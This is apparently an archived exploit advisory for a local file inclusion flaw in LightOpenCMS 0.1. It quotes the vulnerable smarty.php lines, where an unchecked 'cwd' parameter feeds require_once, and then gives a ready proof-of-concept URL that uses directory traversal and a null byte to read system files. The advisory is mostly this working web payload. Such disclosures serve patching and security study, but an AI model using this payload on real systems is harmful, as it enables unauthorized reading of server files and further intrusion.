id: 5410
date: 06/23/2009
title: LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
author: JosS
cves: 

====================================================================
LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
====================================================================


LightOpenCMS 0.1 (smarty.php cwd) Local File Inclusion Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

- download: http://sourceforge.net/project/showfiles.php?group_id=251474

[smarty.php]
 define("SMARTY_DIR", $cwd."/smarty/");
 require_once(SMARTY_DIR."/Smarty.class.php");

PoC:
 [php.ini] register_globals= On
 http://localhost/locms/smarty.php?cwd=../../../../../../../../../../../../boot.ini%00



#  0day.today [2023-03-26]  #